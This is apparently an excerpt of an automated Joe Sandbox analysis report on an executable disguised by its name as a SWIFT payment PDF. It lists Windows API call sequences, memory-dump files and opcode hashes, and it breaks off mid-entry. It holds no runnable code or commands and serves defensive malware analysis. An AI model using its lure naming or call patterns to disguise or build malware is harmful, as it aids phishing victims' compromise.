                                                        • DestroyWindow.USER32(00000000), ref: 0045527A
                                                        • ImageList_Destroy.COMCTL32(?), ref: 0045528C
                                                        • DeleteObject.GDI32(?), ref: 0045564E
                                                        • DeleteObject.GDI32(?), ref: 0045565C
                                                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                        • String ID:
                                                        • API String ID: 3275902921-0
                                                        • Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                        • Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
                                                        • Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                        • Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                                        • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                                        • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                                        • CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                                                        • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                        • String ID:
                                                        • API String ID: 1413079979-0
                                                        • Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                        • Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
                                                        • Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                        • Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
                                                        APIs
                                                        • ___set_flsgetvalue.LIBCMT ref: 0041418F
                                                        • __calloc_crt.LIBCMT ref: 0041419B
                                                        • __getptd.LIBCMT ref: 004141A8
                                                        • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                                                        • __dosmaperr.LIBCMT ref: 00414201
                                                          • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                          • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 1803633139-0
                                                        • Opcode ID: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                        • Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
                                                        • Opcode Fuzzy Hash: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                        • Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
                                                        APIs
                                                        • ImageList_Destroy.COMCTL32(?), ref: 004555E8
                                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                        • DeleteObject.GDI32(?), ref: 0045564E
                                                        • DeleteObject.GDI32(?), ref: 0045565C
                                                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                        • String ID:
                                                        • API String ID: 3275902921-0
                                                        • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                        • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                                                        • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                        • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
                                                        APIs
                                                        • SendMessageW.USER32 ref: 004554DF
                                                        • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                                                        • DeleteObject.GDI32(?), ref: 0045564E
                                                        • DeleteObject.GDI32(?), ref: 0045565C
                                                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                        • String ID:
                                                        • API String ID: 3691411573-0
                                                        • Opcode ID: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                                        • Instruction ID: ead105b7aa3a144aa2df3f4c31681f961a0d6b706109639263d1a652a664e8ec
                                                        • Opcode Fuzzy Hash: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                                        • Instruction Fuzzy Hash: A5118F713046419BDB10DF68DD88A2A77A8FB58322F404A2AFE14DB2D1D775DC498B68
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$_wcstok$ExtentPoint32Text
                                                        • String ID:
                                                        • API String ID: 1814673581-0
                                                        • Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                        • Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
                                                        • Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                        • Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA
                                                        APIs
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                        • String ID:
                                                        • API String ID: 2833360925-0
                                                        • Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                        • Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
                                                        • Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                        • Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
                                                        APIs
                                                          • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                          • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                          • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                          • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                          • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                                        • LineTo.GDI32(?,?,?), ref: 00447227
                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                                        • LineTo.GDI32(?,?,?), ref: 0044723D
                                                        • EndPath.GDI32(?), ref: 0044724E
                                                        • StrokePath.GDI32(?), ref: 0044725C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                        • String ID:
                                                        • API String ID: 372113273-0
                                                        • Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                        • Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
                                                        • Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                        • Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
                                                        APIs
                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Virtual
                                                        • String ID:
                                                        • API String ID: 4278518827-0
                                                        • Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                        • Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
                                                        • Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                        • Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 0044CBEF
                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CapsDevice$Release
                                                        • String ID:
                                                        • API String ID: 1035833867-0
                                                        • Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                        • Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
                                                        • Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                        • Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                                        • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                                                        • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                                          • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
                                                        • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                                        • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                        • String ID:
                                                        • API String ID: 3495660284-0
                                                        • Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                        • Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
                                                        • Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                        • Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                                        • CloseHandle.KERNEL32(00000000), ref: 00437174
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 839392675-0
                                                        • Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                        • Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
                                                        • Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                        • Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
                                                        APIs
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe,00000004), ref: 00436055
                                                        • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                                        • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                                                        • GetLastError.KERNEL32 ref: 00436081
                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                        • String ID:
                                                        • API String ID: 1690418490-0
                                                        • Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                        • Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
                                                        • Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                        • Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
                                                        APIs
                                                          • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                        • CoInitialize.OLE32(00000000), ref: 00475B71
                                                        • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                                                        • CoUninitialize.OLE32 ref: 00475D71
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                        • String ID: .lnk$HH
                                                        • API String ID: 886957087-3121654589
                                                        • Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                        • Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
                                                        • Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                        • Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Menu$Delete$InfoItem_memset
                                                        • String ID: 0
                                                        • API String ID: 1173514356-4108050209
                                                        • Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                        • Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
                                                        • Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                        • Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
                                                        APIs
                                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                                                        • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                                                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
